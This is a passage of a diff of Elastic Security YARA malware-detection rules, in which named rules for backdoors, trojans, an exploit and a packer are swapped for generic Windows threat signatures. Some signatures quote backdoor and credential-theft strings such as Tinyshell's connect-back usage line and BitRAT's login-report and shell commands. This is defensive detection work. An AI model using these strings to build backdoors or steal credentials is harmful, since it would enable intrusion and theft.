02 7B 10 00 00 04 6F 2B 00 00 0A 16 FE 01 0D 09 39 29 01 00 00 } condition: all of them } -rule ELASTIC_Linux_Exploit_CVE_2016_4557_B7E15F5E : FILE MEMORY CVE_2016_4557 +rule ELASTIC_Windows_Generic_Threat_B1Ef4828 : FILE MEMORY { meta: - description = "Detects Linux Exploit Cve 2016 4557 (Linux.Exploit.CVE-2016-4557)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "b7e15f5e-73d2-4718-8fac-e6a285b0c73c" - date = "2022-01-05" - modified = "2022-01-26" + id = "b1ef4828-10bd-41f8-84b5-041bf3147c0b" + date = "2024-03-04" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_CVE_2016_4557.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "bbed2f81104b5eb4a8475deff73b29a350dc8b0f96dcc4987d0112b993675271" - logic_hash = "9c40233fec9607404ca4f78313e0f62922180e5ef88dbf801dd60725af61bdde" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2860-L2879" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "29b20ff8ebad05e4a33c925251d08824ca155f5d9fa72d6f9e359e6ec6c61279" + logic_hash = "d5d63f38308c6f8e5ca54567c7c8b93fcde69601fbcc28d56d5231edd28163cf" score = 75 - quality = 73 - tags = "FILE, MEMORY, CVE-2016-4557" - fingerprint = "14baf456521fd7357a70ddde9da11f27d17a45d7d12c70a0101d6bdc45e30c74" - severity = 100 + quality = 71 + tags = "FILE, MEMORY" + fingerprint = "e867d9a0a489d95898f85578c71d7411eac3142539fcc88df51d1cf048d351a9" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 2E 20 69 66 20 74 68 69 73 20 77 6F 72 6B 65 64 2C 20 79 6F } + $a1 = { 70 36 72 20 74 24 76 28 78 2C 7A 30 7C 34 7E 38 7E 3C 7E 40 7E 54 7E 74 7E 7C 5D } + $a2 = { 7E 30 7E 34 7E 43 7E 4F 7E 5A 7E 6E 7E 79 7E } condition: all of them } -rule ELASTIC_Linux_Backdoor_Tinyshell_67Ee6Fae : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_48Cbdc20 : FILE MEMORY { meta: - description = "Detects Linux Backdoor Tinyshell (Linux.Backdoor.Tinyshell)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "67ee6fae-304b-47f5-93b6-4086a864d433" - date = "2021-10-12" - modified = "2022-01-26" + id = "48cbdc20-386a-491e-8407-f7c4c348f2e9" + date = "2024-03-04" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Backdoor_Tinyshell.yar#L1-L22" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "9d2e25ec0208a55fba97ac70b23d3d3753e9b906b4546d1b14d8c92f8d8eb03d" - logic_hash = "200d4267e21b8934deecc48273294f2e34464fcb412e39f3f5a006278631b9f1" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2881-L2900" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "7a7704c64e64d3a1f76fc718d5b5a5e3d46beeeb62f0493f22e50865ddf66594" + logic_hash = "687d0f3dc85a7e4b23019deec59ee77c211101d40ed6622a952e69ebc4151483" score = 75 - quality = 75 + quality = 71 tags = "FILE, MEMORY" - fingerprint = "f71ce364fb607ee6f4422864674ae3d053453b488c139679aa485466893c563d" - severity = 100 + fingerprint = "98db38ebd05e99171489828491e6acfc7c4322283b325ed99429f366b0ee01a6" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a1 = "Usage: %s [ -c [ connect_back_host ] ] [ -s secret ] [ -p port ]" fullword - $a2 = "s:p:c::" fullword - $b1 = "Usage: %s [ -s secret ] [ -p port ] [command]" fullword - $b2 = " get " fullword + $a1 = { 5E 69 69 69 4E 42 42 42 3E 2E 2E 2E 25 } + $a2 = { 24 2E 2E 2E 2F 41 41 41 3A 51 51 51 47 5D 5D 5D 54 69 69 69 62 } condition: - ( all of ($a*)) or ( all of ($b*)) + all of them } -rule ELASTIC_Windows_Trojan_Darkvnc_Bd803C2E : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_420E1Cdc : FILE MEMORY { meta: - description = "Detects Windows Trojan Darkvnc (Windows.Trojan.DarkVNC)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "bd803c2e-77bd-4b8c-bdfa-11a9bd54a454" - date = "2023-01-23" - modified = "2023-02-01" + id = "420e1cdc-2d47-437a-986d-ff22d2fac978" + date = "2024-03-04" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_DarkVNC.yar#L1-L23" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0fcc1b02fdaf211c772bd4fa1abcdeb5338d95911c226a9250200ff7f8e45601" - logic_hash = "d9e8a42a424d6a186939682e1cd2ed794c8a3765824188e863b1b2829650e2d5" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2902-L2920" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b20254e03f7f1e79fec51d614ee0cfe0cb87432f3a53cf98cf8c047c13e2d774" + logic_hash = "6bd8a7bd4392e04d64f2e0b93d80978f59f9af634a0c971ca61cb9cb593743e0" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "131f4b3ef5b01720a52958058ecc4c3681ed0ca975a1a06cd034d7205680e710" - severity = 100 + fingerprint = "33f35c5c73656fc5987c39fabefa1225fef1734f4217518a1b6e7a78669c90c5" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = "BOT-%s(%s)_%S-%S%u%u" wide fullword - $a2 = "{%08X-%04X-%04X-%04X-%08X%04X}" wide fullword - $a3 = "monitor_off / monitor_on" ascii fullword - $a4 = "bot_shell >" ascii fullword - $a5 = "keyboard and mouse are blocked !" ascii fullword + $a1 = { 55 8B EC 51 56 8B 75 08 85 F6 74 5A ?? ?? ?? ?? ?? 83 F8 03 75 16 56 E8 ED 01 00 00 59 85 C0 56 74 36 50 E8 0C 02 00 00 59 59 EB 3A 83 F8 02 75 26 8D 45 08 50 8D 45 FC 50 56 E8 25 0F 00 00 } condition: all of them } -rule ELASTIC_Windows_Trojan_Bloodalchemy_3793364E : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_4C37E16E : FILE MEMORY { meta: - description = "Detects Windows Trojan Bloodalchemy (Windows.Trojan.BloodAlchemy)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "3793364e-a73c-4cf0-855c-fdcdb2b88386" - date = "2023-09-25" - modified = "2023-09-25" - reference = "https://www.elastic.co/security-labs/disclosing-the-bloodalchemy-backdoor" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_BloodAlchemy.yar#L1-L20" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "c9f03767b92bb2c44f6b386e1f0a521f1a7a063cf73799844cc3423d4a7de7be" + id = "4c37e16e-b7ca-449a-a09f-836706b2f66a" + date = "2024-03-04" + modified = "2024-06-12" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2922-L2941" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "d83a8ed5e192b3fe9d74f3a9966fa094d23676c7e6586c9240d97c252b8e4e74" + logic_hash = "dabac8aa6a3f4d4bd726161fc6573ca9de4088e7d818c3cf33cafc91f680e7aa" score = 75 - quality = 75 + quality = 71 tags = "FILE, MEMORY" - fingerprint = "b4620f360093284ae6f2296b4239227099f58f8f0cfe9f70298c84d6cbe7fa29" - severity = 100 + fingerprint = "9fbd2883fb0140de50df755f7099a0dc3cf377ee350710108fef96c912f43460" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 55 8B EC 51 83 65 FC 00 53 56 57 BF 00 20 00 00 57 6A 40 FF 15 } - $a2 = { 55 8B EC 81 EC 80 00 00 00 53 56 57 33 FF 8D 45 80 6A 64 57 50 89 7D E4 89 7D EC 89 7D F0 89 7D } + $a1 = { 2E 3F 41 56 43 44 72 6F 70 41 70 69 40 40 } + $a2 = { 2D 2D 77 77 6A 61 75 67 68 61 6C 76 6E 63 6A 77 69 61 6A 73 2D 2D } condition: all of them } -rule ELASTIC_Windows_Trojan_Bloodalchemy_E510798D : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_5Be3A474 : FILE MEMORY { meta: - description = "Detects Windows Trojan Bloodalchemy (Windows.Trojan.BloodAlchemy)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "e510798d-a938-47ba-92e3-0c1bcd3ce9a9" - date = "2023-09-25" - modified = "2023-09-25" - reference = "https://www.elastic.co/security-labs/disclosing-the-bloodalchemy-backdoor" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_BloodAlchemy.yar#L22-L41" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "7919bb5f19745a1620e6be91622c40083cbd2ddb02905215736a2ed11e9af5c4" + id = "5be3a474-d12f-489f-a2a7-87d29687e2e6" + date = "2024-03-04" + modified = "2024-06-12" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2943-L2961" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b902954d634307260d5bd8fb6248271f933c1cbc649aa2073bf05e79c1aedb66" + logic_hash = "0f0f46e3bdebb47a4f43ccb64d65ab1e15d68d38c117cb25e5723ec16e7e0758" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "151519156e4c6b5395c03f70c77601681f17f86a08db96a622b9489a3df682d6" - severity = 100 + fingerprint = "8b220ea86ad3bbdcf6e2f976dc0bb84c1eb8cb1f3ad46ab5c9d19289952c912b" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 55 8B EC 83 EC 54 53 8B 5D 08 56 57 33 FF 89 55 F4 89 4D F0 BE 00 00 00 02 89 7D F8 89 7D FC 85 DB } - $a2 = { 55 8B EC 83 EC 0C 56 57 33 C0 8D 7D F4 AB 8D 4D F4 AB AB E8 42 10 00 00 8B 7D F4 33 F6 85 FF 74 03 8B 77 08 } + $a1 = { 55 8B EC 51 53 56 57 8B F9 33 F6 8D 5F 02 66 8B 07 83 C7 02 66 3B C6 75 F5 8A 01 2B FB D1 FF 8D 5F FF 85 DB 7E 23 0F B6 F8 83 C1 02 66 8B 01 8D 49 02 66 2B C7 C7 45 FC 00 08 00 00 66 2B 45 FC } condition: - any of them + all of them } -rule ELASTIC_Windows_Trojan_Bloodalchemy_63084Eea : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_B191061E : FILE MEMORY { meta: - description = "Detects Windows Trojan Bloodalchemy (Windows.Trojan.BloodAlchemy)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "63084eea-358b-4fb0-9668-3f40f0aae9e7" - date = "2023-09-25" - modified = "2023-09-25" - reference = "https://www.elastic.co/security-labs/disclosing-the-bloodalchemy-backdoor" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_BloodAlchemy.yar#L43-L61" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "3fe64502992281511e942b8f4541d61b33e900dbe23ea9f976c7eb9522ce4cbd" + id = "b191061e-7b83-4161-a1d4-05ab70ffe2be" + date = "2024-03-04" + modified = "2024-06-12" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2963-L2981" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "bd4ef6fae7f29def8e5894bf05057653248f009422de85c1e425d04a0b2df258" + logic_hash = "cbee10eab984249ceb9f8a82dc06aa014d6a249321f3d4f0d1e5657aab205ec8" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "3f6ef0425b846b2126263c590d984bc618ad61de91a9141160c2b804c585ff6d" - severity = 100 + fingerprint = "5733de0357a6b5f6a3fe885786084c23707266b48e67b19dcddc48ed97e94207" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a = { 55 8B EC 83 EC 38 53 56 57 8B 75 08 8D 7D F0 33 C0 33 DB AB 89 5D C8 89 5D D0 89 5D D4 AB 89 5D } + $a1 = { 83 EC 2C 64 A1 30 00 00 00 33 D2 53 56 57 8B 40 0C 8B F2 89 4D E8 89 55 F4 89 75 F8 8B 58 0C 8B 7B 18 89 7D F0 85 FF 0F 84 34 01 00 00 C7 45 E0 60 00 00 00 8B 43 30 89 55 FC 89 55 EC } condition: all of them } -rule ELASTIC_Windows_Trojan_Bloodalchemy_C2D80609 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_05F52E4D : FILE MEMORY { meta: - description = "Detects Windows Trojan Bloodalchemy (Windows.Trojan.BloodAlchemy)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "c2d80609-9a66-4fbb-b594-17d16372cb14" - date = "2023-09-25" - modified = "2023-09-25" - reference = "https://www.elastic.co/security-labs/disclosing-the-bloodalchemy-backdoor" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_BloodAlchemy.yar#L63-L81" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "694a0f917f106fbdde4c8e5dd8f9cdce56e9423ce5a7c3a5bf30bf43308d42e9" + id = "05f52e4d-d131-491a-a037-069b450e3b3e" + date = "2024-03-04" + modified = "2024-06-12" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2983-L3001" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e578b795f8ed77c1057d8e6b827f7426fd4881f02949bfc83bcad11fa7eb2403" + logic_hash = "79898b59b6d3564aad85d823a1450600faff5b1d2dbfbe0cee4cc59971e4f542" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "8815e42ef85ae5a8915cd26b573cd7411c041778cdf4bc99efd45526e3699642" - severity = 100 + fingerprint = "f3d5f6dc1f9b51ce1700605c8a018000124d66a260771de0da1a321dc97872dd" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a = { 55 8B EC 83 EC 30 53 56 57 33 C0 8D 7D F0 AB 33 DB 68 02 80 00 00 6A 40 89 5D FC AB AB FF 15 28 } + $a1 = { 28 00 00 06 73 45 00 00 0A 73 46 00 00 0A 6F 47 00 00 0A 14 FE 06 29 00 00 06 73 45 00 00 0A 73 46 00 00 0A 0B 14 FE 06 2A 00 00 06 73 45 00 00 0A 73 46 00 00 0A 0C 07 6F 47 00 00 0A 08 6F 47 } condition: all of them } -rule ELASTIC_Windows_Trojan_Bloodalchemy_De591C5A : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_C34E19E9 : FILE MEMORY { meta: - description = "Detects Windows Trojan Bloodalchemy (Windows.Trojan.BloodAlchemy)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "de591c5a-95a5-4a23-bc02-7bc487b6ca4b" - date = "2023-09-25" - modified = "2023-11-02" - reference = "https://www.elastic.co/security-labs/disclosing-the-bloodalchemy-backdoor" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_BloodAlchemy.yar#L83-L106" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "fd5cfe2558a7c02a617003140cdcf477ec451ecea4adf2808bef8f93673c28f1" + id = "c34e19e9-c666-4fc5-bbb3-75f64d247899" + date = "2024-03-04" + modified = "2024-06-12" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L3003-L3021" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f9048348a59d9f824b45b16b1fdba9bfeda513aa9fbe671442f84b81679232db" + logic_hash = "87999b6f2cf359b6436ee7e57691ac73fc41f3947bf8fef3f6b98148e17f180d" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "6765378490707c5965dc4abd04169d4a94b787be3fccf3b77f1eff5d507090a4" - severity = 100 + fingerprint = "148ffb1f73a3f337d188c78de638880ea595a812dfa7a0ada6dc66805637aeb3" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $crypto_0 = { 32 C7 8A DF 88 04 39 8B C1 6A 05 59 F7 F1 8A C7 8D 4A 01 D2 E3 B1 07 2A CA D2 E8 8B 4D F8 0A D8 02 FB 41 } - $crypto_1 = { 8A 1F 0F B6 C3 83 E0 7F D3 E0 99 09 55 ?? 0B F0 47 84 DB 79 ?? 83 C1 07 83 F9 3F } - $crypto_2 = { E8 [4] 03 F0 33 D2 8B C6 89 75 ?? 25 FF FF FF 7F 6A 34 59 F7 F1 8B 45 ?? 66 8B 0C 55 [4] 66 89 0C 43 40 89 45 ?? 3B C7 } - $crypto_3 = { 61 00 62 00 63 00 64 00 65 00 66 00 67 00 68 00 69 00 6A 00 6B 00 6C 00 6D 00 6E 00 6F 00 70 00 71 00 72 00 73 00 74 00 } - $com_tm_cid = { 9F 36 87 0F E5 A4 FC 4C BD 3E 73 E6 15 45 72 DD } - $com_tm_iid = { C0 C7 A4 AB 2F A9 4D 13 40 96 97 20 CC 3F D4 0F 85 } + $a1 = { 28 00 00 0A 73 18 00 00 0A 7E 02 00 00 04 17 8D 3A 00 00 01 25 16 1F 2C 9D 6F 28 00 00 0A 8E 69 6F 29 00 00 0A 9A 0A 7E 01 00 00 04 17 8D 3A 00 00 01 25 16 1F 2C 9D 6F 28 00 00 0A 73 18 00 00 } condition: - any of ($crypto_*) and all of ($com_tm_*) + all of them } -rule ELASTIC_Linux_Packer_Patched_UPX_62E11C64 : FILE +rule ELASTIC_Windows_Generic_Threat_E691Eaa1 : FILE MEMORY { meta: - description = "Detects Linux Packer Patched_Upx (Linux.Packer.Patched_UPX)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "62e11c64-fc7d-4a0a-9d72-ad53ec3987ff" - date = "2021-06-08" - modified = "2021-07-28" - reference = "https://cujo.com/upx-anti-unpacking-techniques-in-iot-malware/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Packer_Patched_UPX.yar#L1-L20" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "02f81a1e1edcb9032a1d7256a002b11e1e864b2e9989f5d24ea1c9b507895669" - logic_hash = "cb576fdd59c255234a96397460b81cbb2deeb38befaed101749b7bb515624028" + id = "e691eaa1-06fa-478e-8c4c-95a7df3fd077" + date = "2024-03-04" + modified = "2024-06-12" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L3023-L3041" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "afa5f36860e69b9134b93e9ad32fed0a5923772e701437e1054ea98e76f28a77" + logic_hash = "0ac310e3f7cf99b77c2dcfea582752e2f1414caf43965c25d2f3f03cf27586cc" score = 75 quality = 75 - tags = "FILE" - fingerprint = "3297b5c63e70c557e71b739428b453039b142e1e04c2ab15eea4627d023b686d" - severity = 60 + tags = "FILE, MEMORY" + fingerprint = "b940eb10e338f6d703a75cd77b4b455503ae0583f5a36b8115e659d05990fc3c" + severity = 50 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 55 50 58 21 [4] 00 00 00 00 00 00 00 00 00 00 00 00 } + $a1 = { 55 8B EC 51 8B C2 53 89 45 FC 8B D9 56 99 33 F6 2B C2 57 8B F8 D1 FF 85 FF 7E 2B 8B 55 FC 4A 03 D3 0F B6 02 8D 52 FF 8A 0C 1E ?? ?? ?? ?? ?? ?? ?? 88 04 1E 46 0F B6 C1 } condition: - all of them and $a in (0..255) + all of them } -rule ELASTIC_Windows_Trojan_Bitrat_34Bd6C83 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_5E33Bb4B : FILE MEMORY { meta: - description = "Detects Windows Trojan Bitrat (Windows.Trojan.Bitrat)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "34bd6c83-9a71-43d5-b0b1-1646a8fb66e8" - date = "2021-06-13" - modified = "2021-08-23" + id = "5e33bb4b-830e-4814-b6cf-d5e5b4da7ada" + date = "2024-03-04" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Bitrat.yar#L1-L23" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "37f70ae0e4e671c739d402c00f708761e98b155a1eefbedff1236637c4b7690a" - logic_hash = "d386fc2a4b6a98638328d1aa05a8d8dbb7a1bbcd72943457b1a5a27b056744ef" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L3043-L3061" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "13c06d7b030a46c6bb6351f40184af9fafaf4c67b6a2627a45925dd17501d659" + logic_hash = "7e2002c3917ccab7d9f56a7aa20ea75be71aa7fdc64b7c3f87edb68be38e74b2" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "bc4a5fad1810ad971277a455030eed3377901a33068bb994e235346cfe5a524f" - severity = 100 + fingerprint = "a08b9db015f1b6f62252d456b1b0cd0fdec1e19cdd2bc1400fe2bf76150ea07b" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = "crd_logins_report" ascii fullword - $a2 = "drives_get" ascii fullword - $a3 = "files_get" ascii fullword - $a4 = "shell_stop" ascii fullword - $a5 = "hvnc_start_ie" ascii fullword + $a1 = { 43 3A 5C 55 73 65 72 73 5C 61 64 6D 69 6E 5C 44 65 73 6B 74 6F 70 5C 57 6F 72 6B 5C 46 69 6C 65 49 6E 73 74 61 6C 6C 65 72 5C 52 65 6C 65 61 73 65 5C 46 69 6C 65 49 6E 73 74 61 6C 6C 65 72 2E 70 64 62 } condition: all of them } -rule ELASTIC_Windows_Trojan_Bitrat_54916275 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_Be64Ba10 : FILE MEMORY { meta: - description = "Detects Windows Trojan Bitrat (Windows.Trojan.Bitrat)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "54916275-2a0f-4966-956d-7122a4aea9c8" - date = "2022-08-29" - modified = "2022-09-29" + id = "be64ba10-ea9d-45df-8c9b-2facc825b652" + date = "2024-03-04" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Bitrat.yar#L25-L43" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d3b2c410b431c006c59f14b33e95c0e44e6221b1118340c745911712296f659f" - logic_hash = "4c66f79f4bf6bde49bfb9208e6dc1d3b5d041927565e7302381838b0f32da6f4" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L3063-L3082" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "24bb4fc117aa57fd170e878263973a392d094c94d3a5f651fad7528d5d73b58a" + logic_hash = "c6acce53610baf119a0e2d55fc698a976463bbd21b739d4ac39a75383fa5fed2" score = 75 - quality = 75 + quality = 71 tags = "FILE, MEMORY" - fingerprint = "8758b1a839ff801170f6d4ae9186a69af6370f8081defdd25b62e50a3ddcffef" - severity = 100 + fingerprint = "9496099988cf4f854bf7f70bae158c6e17025a7537245c5f1d92a90f6b9bca67" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 6A 10 68 50 73 78 00 E8 5F 4D 02 00 8B 7D 08 85 FF 75 0D FF 15 1C 00 6E 00 50 FF 15 68 03 6E 00 } + $a1 = { 22 65 6E 63 72 79 70 74 65 64 5F 6B 65 79 22 3A 22 28 2E 2B 3F 29 22 } + $a2 = { 2E 3F 41 56 3C 6C 61 6D 62 64 61 5F 37 65 66 38 63 66 32 36 39 61 32 32 38 62 36 30 34 64 36 35 34 33 32 65 37 65 63 33 37 30 31 34 3E 40 40 } condition: all of them } -rule ELASTIC_Linux_Trojan_Adlibrary_2E908E5F : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_7Bb75582 : FILE MEMORY { meta: - description = "Detects Linux Trojan Adlibrary (Linux.Trojan.Adlibrary)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "2e908e5f-f79e-491f-8959-86b7cffd35c0" - date = "2022-08-23" - modified = "2022-10-18" + id = "7bb75582-ffcd-4a91-8816-811a3f9bdec8" + date = "2024-03-04" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Adlibrary.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "acb22b88ecfb31664dc07b2cb3490b78d949cd35a67f3fdcd65b1a4335f728f1" - logic_hash = "0d0df636876adf0268b7a409bfc9d8bfad298793d11297596ef91aeba86889da" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L3084-L3102" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "35f9698e9b9f611b3dd92466f18f97f4a8b4506ed6f10d4ac84303177f43522d" + logic_hash = 